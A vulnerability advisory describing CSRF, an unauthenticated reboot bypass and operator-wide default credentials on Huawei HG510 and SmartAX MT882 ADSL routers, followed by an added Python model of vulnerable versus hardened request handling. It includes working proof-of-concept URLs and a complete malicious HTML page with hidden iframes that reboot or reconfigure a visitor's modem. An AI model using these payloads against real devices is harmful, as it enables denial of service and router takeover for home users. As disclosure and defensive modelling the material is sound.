Ivan Marković

Security consultant and researcher

Extensive experience in designing and implementing security solutions, mainly for web, mobile and embedded applications. Author of penetration testing tools recognized by the OWASP organization and the BackTrack Linux distribution. Research work includes the discovery of vulnerabilities in numerous applications and services, for which the author received public acknowledgement from Microsoft.

Contact via LinkedIn or read interesting stuff on Twitter.

Huawei HG510 Security Bypass and Cross-Site Request Forgery Vulnerabilities

Title :  Huawei HG510 Multiple Vulnerabilities
Impact : Authentication bypass, DoS
Type : Local, Remote
Vendor :
- Url : http://www.huawei.com/


|| Description

Huawei HG510 is an ADSL modem/router supplied by the Serbian telecom operator to provide ADSL Internet connectivity.
Administration of the device is meant to be possible only from the local LAN, but the web interface is not bound to the private address alone (e.g. 192.168.1.1): it also answers on the device's public IP address, so the management interface is reachable from the Internet.


|| Vulnerability

There is no CSRF protection, so a malicious web page can make the victim's browser issue requests to the device. If the user is logged into the device's web interface (the browser replays the HTTP basic-auth credentials automatically), such a page can change the administrator password or other settings.

.: POC (CSRF)
   http://PUBLIC_IP_OF_USER/password.cgi?sysPassword=BASE64_NEW_PASSWORD

While testing we found strange behaviour in /rebootinfo.cgi (the script that reboots the device).
Normally, for any of these CSRF requests the user must be logged into the device's web interface, but a request to
http://PUBLIC_IP_OF_USER/rebootinfo.cgi bypasses basic authentication entirely and the device
is rebooted.

So CSRF combined with the authentication bypass leads to a denial of service for the end user: no credentials or prior login are needed, only the victim's public IP address.

.: POC (CSRF + Auth Bypass => DoS)
   http://PUBLIC_IP_OF_USER/rebootinfo.cgi

   
|| Notice

The Serbian telecom operator uses the same username/password for all clients, so a malicious user
can rely on social engineering or clickjacking to get the victim logged into the web interface, or simply embed the shared credentials in the URL, and then perform the CSRF requests.

.: POC (Login => CSRF)
   http://telekom:telekom@PUBLIC_IP_OF_USER/password.cgi?sysPassword=BASE64_NEW_PASSWORD

Similar vulnerabilities were found on other devices used by the Serbian telecom operator, e.g.:
 
Huawei SmartAX MT882

.: POC (Login => CSRF)
   http://admin:admin@PUBLIC_IP_OF_USER/Action?save_reboot=1&reboot_loc=0&id=5

|| Example of attack with malicious HTML page:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>TELEKOM SRBIJA CSRF DISCONNECT</title>
</head>
<body>
TELEKOM SRBIJA CSRF DISCONNECT
<br />
- If you are using TELEKOM ADSL and a non-IE browser, this page may disconnect you from the network ;)
<br />
<br />
<br />
<!-- $_SERVER['REMOTE_ADDR'] is the visitor's public address, i.e. the WAN side of their own modem. -->
<!-- HG510: rebootinfo.cgi requires no authentication (auth bypass), so no credentials are needed. -->
<iframe style="display:none" src="http://<?php echo $_SERVER['REMOTE_ADDR']; ?>/rebootinfo.cgi"></iframe>
<!-- HG510: same request with the operator-wide default credentials in the URL (Internet Explorer refuses user:pass@ URLs, hence "non-IE"). -->
<iframe style="display:none" src="http://telekom:telekom@<?php echo $_SERVER['REMOTE_ADDR']; ?>/rebootinfo.cgi"></iframe>
<!-- SmartAX MT882: reboot action, without and with its default credentials. -->
<iframe style="display:none" src="http://<?php echo $_SERVER['REMOTE_ADDR']; ?>/Action?save_reboot=1&reboot_loc=0&id=5"></iframe>
<iframe style="display:none" src="http://admin:admin@<?php echo $_SERVER['REMOTE_ADDR']; ?>/Action?save_reboot=1&reboot_loc=0&id=5"></iframe>
</body>
</html>
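The following is an added example, not Huawei firmware and not the author's code. It models the HG510's CGI dispatcher in Python so the three PoCs above can be replayed offline: a vulnerable dispatcher where each CGI decides for itself whether to check basic auth (and /rebootinfo.cgi forgets to), beside a hardened one that binds management to the LAN address, checks auth centrally before any handler runs, refuses state changes on GET, and requires a matching Origin and a per-device CSRF token. The endpoint names (password.cgi, rebootinfo.cgi, sysPassword) and the telekom:telekom default come from the advisory; the hardened checks, the sample public address 203.0.113.7 and the session/token handling are assumptions about what a fix would look like.

```python
import base64
import hmac
import secrets
from dataclasses import dataclass, field

ADMIN_USER = "telekom"
DEFAULT_PASS = "telekom"       # operator-wide default credential, per the advisory
LAN_ADDR = "192.168.1.1"       # address the management interface should be bound to
PUBLIC_ADDR = "203.0.113.7"    # constructed sample WAN address (documentation range)


@dataclass
class Request:
    method: str
    dst: str                   # address the request was sent to (Host header)
    path: str
    query: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


@dataclass
class Device:
    password: str = DEFAULT_PASS
    rebooted: bool = False
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def basic_header(user: str, pw: str) -> dict:
    """What a browser sends after resolving http://user:pw@host/ or replaying cached Basic creds."""
    return {"Authorization": "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()}


def basic_auth_ok(req: Request, dev: Device) -> bool:
    auth = req.headers.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        user, _, pw = base64.b64decode(auth[6:]).decode().partition(":")
    except ValueError:                 # covers binascii.Error and UnicodeDecodeError
        return False
    return (hmac.compare_digest(user.encode(), ADMIN_USER.encode())
            and hmac.compare_digest(pw.encode(), dev.password.encode()))


# ---- vulnerable dispatcher: each CGI decides for itself whether to check auth ----
def vulnerable_handle(req: Request, dev: Device) -> int:
    if req.path == "/password.cgi":
        if not basic_auth_ok(req, dev):
            return 401
        dev.password = base64.b64decode(req.query["sysPassword"]).decode()  # state change on GET
        return 200
    if req.path == "/rebootinfo.cgi":
        dev.rebooted = True            # no auth check at all: the bypass from the advisory
        return 200
    return 404


# ---- hardened dispatcher (an assumed fix, not vendor code) ----
STATE_CHANGING = {"/password.cgi", "/rebootinfo.cgi"}


def hardened_handle(req: Request, dev: Device) -> int:
    if req.dst != LAN_ADDR:                                   # never answer on the WAN address
        return 403
    if req.path not in STATE_CHANGING:
        return 404
    if not basic_auth_ok(req, dev):                           # one central check, before any handler
        return 401
    if req.method != "POST":                                  # no state change on GET
        return 405
    if req.headers.get("Origin") != f"http://{LAN_ADDR}":     # cross-site POSTs carry a foreign Origin
        return 403
    if not hmac.compare_digest(req.query.get("csrf", ""), dev.csrf_token):  # per-device token
        return 403
    if req.path == "/password.cgi":
        dev.password = base64.b64decode(req.query["sysPassword"]).decode()
    else:
        dev.rebooted = True
    return 200


NEW_PW = base64.b64encode(b"pwned").decode()   # the BASE64_NEW_PASSWORD from the PoC URLs
CREDS = basic_header("telekom", "telekom")


def replay_pocs(handle) -> dict:
    """Send the advisory's three PoC requests to a fresh device via its public address."""
    dev = Device()
    return {
        "reboot_no_auth": handle(Request("GET", PUBLIC_ADDR, "/rebootinfo.cgi"), dev),
        "pw_no_auth": handle(Request("GET", PUBLIC_ADDR, "/password.cgi", {"sysPassword": NEW_PW}), dev),
        "pw_url_creds": handle(Request("GET", PUBLIC_ADDR, "/password.cgi", {"sysPassword": NEW_PW}, CREDS), dev),
        "rebooted": dev.rebooted,
        "password_changed": dev.password != DEFAULT_PASS,
    }


def hardened_lan_cases() -> dict:
    """CSRF attempts from a victim on the LAN against the hardened device, plus one legitimate request."""
    dev = Device()
    attacker = {"Origin": "http://attacker.example", **CREDS}
    legit = {"Origin": f"http://{LAN_ADDR}", **CREDS}
    return {
        "csrf_get": hardened_handle(Request("GET", LAN_ADDR, "/rebootinfo.cgi", {}, CREDS), dev),
        "csrf_post": hardened_handle(Request("POST", LAN_ADDR, "/rebootinfo.cgi", {}, attacker), dev),
        "legit_post": hardened_handle(Request("POST", LAN_ADDR, "/rebootinfo.cgi", {"csrf": dev.csrf_token}, legit), dev),
        "rebooted": dev.rebooted,
    }


if __name__ == "__main__":
    print("vulnerable:", replay_pocs(vulnerable_handle))
    print("hardened:", replay_pocs(hardened_handle))
    print("hardened, LAN victim:", hardened_lan_cases())
```

Against the vulnerable dispatcher the unauthenticated reboot and the URL-credential password change both succeed (only the bare password.cgi request gets a 401, which is exactly the gap the shared default credentials close). The hardened dispatcher rejects everything arriving on the public address before any handler runs, and even from a LAN victim with cached credentials the GET is refused (405) and a cross-site POST fails on Origin (403); only a same-origin POST carrying the token reboots the device.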


|| Contact

Author : Ivan Markovic <ivanm@security-net.biz>

http://www.securityfocus.com/bid/38261/info
https://www.exploit-db.com/exploits/33648/